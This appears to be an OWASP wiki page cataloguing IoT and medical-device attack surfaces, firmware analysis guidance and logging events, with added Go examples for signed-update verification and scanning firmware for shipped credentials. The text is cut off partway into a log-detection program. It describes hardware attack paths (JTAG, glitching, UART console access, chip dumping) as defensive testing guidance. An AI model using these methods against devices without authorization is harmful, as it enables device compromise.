* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Physical tampering<br />
* Physical damage<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 to 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, we can modify the execution of the firmware in the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow or be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we can obtain full console access to the device<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
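The update-related rows above (''Update Sent Without Encryption'', ''Update Location Writable'', ''Missing Update Mechanism'') and the ''Update Mechanism'' attack surface come down to one device-side control: the device must verify a signed manifest before it installs anything. The Go program below is an added example written for this page, not code from the OWASP project or from any vendor; the manifest layout, the ''example-cam'' product name and the version numbers are assumptions made up for the example. It uses Ed25519 from the Go standard library: the vendor signs a manifest carrying the product, a monotonically increasing version and the SHA-256 digest of the image, and the device, which holds only the public key, rejects bad signatures, wrong products, downgrades and images whose digest does not match.<br />
<br />
```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
)

// Manifest describes one firmware image. Field names and layout are this
// example's own, not any vendor's update format.
type Manifest struct {
	Product     string `json:"product"`      // ties the image to one product line
	Version     uint32 `json:"version"`      // must increase, which blocks downgrades
	ImageSHA256 []byte `json:"image_sha256"` // digest of the image bytes
}

// SignedUpdate is what the update server ships: the manifest bytes, an
// Ed25519 signature over exactly those bytes, and the image itself.
type SignedUpdate struct {
	ManifestJSON []byte
	Signature    []byte
	Image        []byte
}

var (
	ErrBadSignature = errors.New("manifest signature invalid")
	ErrWrongProduct = errors.New("manifest is for a different product")
	ErrRollback     = errors.New("update is not newer than the installed version")
	ErrImageHash    = errors.New("image digest does not match the signed manifest")
)

// Verify is the device-side check. vendorPub is provisioned at manufacture;
// the matching private key stays in the vendor's signing service. The image
// is bound to the manifest by its digest, so a writable update location or
// an unencrypted download cannot substitute a tampered or older image
// without also forging the signature.
func Verify(vendorPub ed25519.PublicKey, product string, installed uint32, u SignedUpdate) (*Manifest, error) {
	if !ed25519.Verify(vendorPub, u.ManifestJSON, u.Signature) {
		return nil, ErrBadSignature
	}
	var m Manifest
	if err := json.Unmarshal(u.ManifestJSON, &m); err != nil {
		return nil, err
	}
	if m.Product != product {
		return nil, ErrWrongProduct
	}
	if m.Version <= installed {
		return nil, ErrRollback
	}
	sum := sha256.Sum256(u.Image)
	if !bytes.Equal(sum[:], m.ImageSHA256) { // digest of public data, so no timing concern
		return nil, ErrImageHash
	}
	return &m, nil
}

// Sign is the vendor side, included so the example runs end to end.
func Sign(priv ed25519.PrivateKey, m Manifest, image []byte) (SignedUpdate, error) {
	sum := sha256.Sum256(image)
	m.ImageSHA256 = sum[:]
	mj, err := json.Marshal(m)
	if err != nil {
		return SignedUpdate{}, err
	}
	return SignedUpdate{ManifestJSON: mj, Signature: ed25519.Sign(priv, mj), Image: image}, nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	image := []byte("constructed firmware image bytes") // stand-in for a real image
	upd, _ := Sign(priv, Manifest{Product: "example-cam", Version: 5}, image)

	_, err := Verify(pub, "example-cam", 4, upd)
	fmt.Println("genuine update, device on v4:", err)

	tampered := upd
	tampered.Image = append([]byte(nil), image...)
	tampered.Image[0] ^= 0x01 // flip one bit; the signed digest no longer matches
	_, err = Verify(pub, "example-cam", 4, tampered)
	fmt.Println("tampered image:", err)

	_, err = Verify(pub, "example-cam", 5, upd)
	fmt.Println("same version offered to a device already on v5:", err)
}
```
<br />
TLS on the download path protects confidentiality in transit, but it is the signature over the manifest, not the transport, that stops a modified or older image, which is why a writable update location or an intercepted download does not by itself let an unsigned image through. The rollback check only holds if the installed version number is itself kept in storage the attacker cannot rewrite.<br />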
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Physical tampering<br />
* Physical damage<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
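As a concrete instance of the ''File system analysis'' step and of the ''Hardcoded or easy to guess credentials'', ''Encryption key exposure'' and ''Backdoor accounts'' items above, the Go program below walks an extracted root file system and reports what a vendor should not be shipping in an image. It is an added example written for this page, in the spirit of tools such as Firmwalker but not code from them or from the OWASP project; the tree it scans is a constructed mini file system whose password hash, private key and API key are placeholder values made up for the example, and the regular expressions are a deliberately small starting set.<br />
<br />
```go
package main

import (
	"io/fs"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Finding is one item the scan reports; Kind is its category.
type Finding struct{ Path, Kind, Detail string }

var (
	pemPrivateKey = regexp.MustCompile(`-----BEGIN (RSA |EC |OPENSSH |)PRIVATE KEY-----`)
	credAssign    = regexp.MustCompile(`(?i)^\s*(passwd|password|secret|api_key|token)\s*[=:]\s*\S+`)
)

// ScanRootfs walks an extracted root file system and reports shipped password
// hashes, passwordless accounts, private keys and plaintext credentials in
// config files. Paths in findings are relative to root.
func ScanRootfs(root string) ([]Finding, error) {
	var out []Finding
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil || !d.Type().IsRegular() {
			return err
		}
		rel, _ := filepath.Rel(root, p)
		rel = filepath.ToSlash(rel)
		data, err := os.ReadFile(p)
		if err != nil {
			return err
		}
		text := string(data)
		switch {
		case rel == "etc/passwd" || rel == "etc/shadow":
			out = append(out, scanPasswordFile(rel, text)...)
		case pemPrivateKey.MatchString(text):
			out = append(out, Finding{rel, "private-key", "PEM private key shipped in the image"})
		default:
			for _, line := range strings.Split(text, "\n") {
				if credAssign.MatchString(line) {
					out = append(out, Finding{rel, "plaintext-credential", strings.TrimSpace(line)})
				}
			}
		}
		return nil
	})
	return out, err
}

// scanPasswordFile reads passwd/shadow style "user:hash:..." lines.
func scanPasswordFile(rel, text string) []Finding {
	var out []Finding
	for _, line := range strings.Split(text, "\n") {
		fields := strings.Split(line, ":")
		if len(fields) < 2 {
			continue
		}
		user, hash := fields[0], fields[1]
		switch {
		case hash == "":
			out = append(out, Finding{rel, "empty-password", user + " has no password"})
		case hash == "x" || hash == "*" || strings.HasPrefix(hash, "!"): // shadowed or locked
		default: // any shipped hash can be attacked offline; a $1$ (md5-crypt) hash is especially weak
			out = append(out, Finding{rel, "hardcoded-password-hash", user + " has hash " + hash})
		}
	}
	return out
}

// DemoScan writes a constructed mini root file system (every value is a
// placeholder made up for this example) into a temp directory and scans it.
func DemoScan() ([]Finding, error) {
	dir, err := os.MkdirTemp("", "rootfs-example")
	if err != nil {
		return nil, err
	}
	defer os.RemoveAll(dir)
	files := map[string]string{
		"etc/passwd":         "root:$1$Zx0N$QmXkUjBbLzO7HkJvPdK9c1:0:0:root:/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n",
		"etc/shadow":         "admin::18000:0:99999:7:::\nnobody:*:18000:0:99999:7:::\n",
		"etc/ssl/device.key": "-----BEGIN PRIVATE KEY-----\nQ09OU1RSVUNURUQtUExBQ0VIT0xERVI=\n-----END PRIVATE KEY-----\n",
		"etc/cloud.conf":     "endpoint=https://example.invalid/api\napi_key=constructed-placeholder-key\n",
	}
	for rel, content := range files {
		p := filepath.Join(dir, filepath.FromSlash(rel))
		if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
			return nil, err
		}
		if err := os.WriteFile(p, []byte(content), 0o644); err != nil {
			return nil, err
		}
	}
	return ScanRootfs(dir)
}
```
<br />
Point ScanRootfs at the directory produced by extracting a firmware image (for example with binwalk) rather than at the constructed tree; a real review should also cover the same items inside binaries' string tables, which this regex-over-text pass does not, and should treat every hit in ''etc/passwd'' as a backdoor candidate until the account's purpose is explained.<br />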
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
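Turned into detection logic, several of the events above become simple stateful rules over a device's authentication and ecosystem log. The Go program below is an added example written for this page, not code from the OWASP project: the log line format (an RFC 3339 timestamp followed by key=value fields), the field names (''device'', ''src'', ''user'', ''event'', ''result'', ''cred''), the thresholds and the sample log lines are all constructed for the example. It raises ''Multiple Failed Passwords'', ''High Rate of Login Attempts'' (a sliding 60-second window per source address), ''Device Accessed Using Default Administrative Credentials'', ''Traffic Seen from Disenrolled System'' and ''Device Case Tampering Detected''.<br />
<br />
```go
package main

import (
	"fmt"
	"strings"
	"time"
)

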